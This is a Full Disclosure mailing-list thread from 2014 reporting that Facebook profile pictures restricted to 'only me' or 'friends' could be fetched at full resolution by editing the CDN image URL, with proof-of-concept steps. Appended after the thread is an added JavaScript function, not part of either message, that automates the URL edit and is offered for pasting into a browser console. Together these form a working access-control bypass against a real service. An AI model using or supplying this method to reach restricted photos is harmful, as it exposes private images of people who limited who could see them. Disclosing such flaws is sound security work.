Full Disclosure mailing list archives

Re: Access anyone's Facebook "profile picture" in full resolution regardless of the ACL restriction


From: Mario Vilas <mvilas () gmail com>
Date: Tue, 1 Apr 2014 20:39:21 +0200

I haven't verified, but isn't this how browser plugins like the following
work?

https://chrome.google.com/webstore/detail/photo-zoom-for-facebook/elioihkkcdgakfbahdoddophfngopipi

Haven't tried it myself, but it seems reasonable to think so.


On Tue, Apr 1, 2014 at 11:59 AM, Bipin Gautam <bipin.gautam () gmail com> wrote:

Hi List,

I felt like writing about / pointing out this minor issue, as it is "Facebook"
...

This issue is due to the way Facebook pictures are stored in the CDN
without an authentication mechanism when accessing them (which would be
technically complicated to implement).

Also, it is a Facebook feature that... if you have the full path of an
image, you can pass it to anyone over the internet and they can
access it directly (and the Facebook user should not have an unrealistic
expectation of privacy. Hence, if someone can access an image they can
save/email it to others anyway.)


POC:

( Please TEST it on a real profile, a real world example, and it should
work. I obviously changed the URL in the POC below to gibberish
"6549_16544614736_444444875_n.jpg" )

STEPS:

You could try this by:

- changing your own Facebook profile picture's visibility to "only me",
then bookmarking your own Facebook profile, logging out and clearing the cache.

- or trying a different browser with your own profile from the bookmark,
without logging in to Facebook!

- or passing your FB profile to a friend, with the following instructions.

___

- then, in your browser, "Right click the Facebook profile image" that
you want to access in full resolution (that has an ACL of access to
"only me" or "friends") > click "Copy image location" > paste it in
Notepad

Sample URL you will get (this link below is broken):

[1]
https://fbcdn-profile-a.akamaihd.net/hprofile-ak-frc3/t1.0-1/c0.18.160.160/p160x160/6549_16544614736_444444875_n.jpg


Remove from [1]: "/c0.18.160.160/p160x160"   (in other cases the URL
structure may be different; you just have to find and remove this
middle part...)

Final modified URL from above, with which you can access the profile
picture in full resolution via your browser:


https://fbcdn-profile-a.akamaihd.net/hprofile-ak-frc3/t1.0-1/6549_16544614736_444444875_n.jpg


Respectfully,
-bipin


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/




-- 
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”

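The URL edit the quoted post describes (drop the crop and size path segments so the remaining CDN path points at the full-resolution file), as an added example that is not part of either message in this thread. It generalises the single sample URL in the post: the exact shapes of the crop segment ("c<x>.<y>.<w>.<h>") and size segment ("p<W>x<H>" or "s<W>x<H>") are assumptions of this example, not stated on the page, which only shows "c0.18.160.160" and "p160x160"; the sample URL is the post's own deliberately altered one.

```javascript
// Added example (not from the original post): strip the crop/resize path
// segments from a Facebook CDN profile-picture URL, leaving the path that
// the post says serves the full-resolution image.
//
// Assumptions (not stated on the page): a crop segment looks like
// "c<x>.<y>.<w>.<h>" and a size segment like "p<W>x<H>" or "s<W>x<H>".
// The post's sample only shows the "c..." and "p..." forms.
const CROP_SEGMENT = /^c\d+\.\d+\.\d+\.\d+$/;   // e.g. c0.18.160.160
const SIZE_SEGMENT = /^[ps]\d+x\d+$/;          // e.g. p160x160

function isResizeSegment(segment) {
  return CROP_SEGMENT.test(segment) || SIZE_SEGMENT.test(segment);
}

// Returns the path segments that would be removed, so a caller can see
// what crop/size the thumbnail was served at before requesting the original.
function resizeSegments(urlString) {
  return new URL(urlString).pathname.split("/").filter(isResizeSegment);
}

// Returns the URL with every crop/size segment removed from the path.
// Host, scheme and file name are left untouched; a URL that already has
// no such segments comes back unchanged.
function stripResizeSegments(urlString) {
  const url = new URL(urlString);
  const kept = url.pathname.split("/").filter((seg) => !isResizeSegment(seg));
  url.pathname = kept.join("/");
  return url.toString();
}

// Constructed input: the (deliberately altered) sample URL from the post.
const SAMPLE =
  "https://fbcdn-profile-a.akamaihd.net/hprofile-ak-frc3/t1.0-1/c0.18.160.160/p160x160/6549_16544614736_444444875_n.jpg";

if (typeof require !== "undefined" && require.main === module) {
  console.log("removed:", resizeSegments(SAMPLE));
  console.log("full-res:", stripResizeSegments(SAMPLE));
}
```

Paste the function into the browser console on the page the image was copied from and call it on the copied image location; it performs the same "find and remove the middle part" step the post describes, without guessing at segments that do not match the two assumed patterns.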
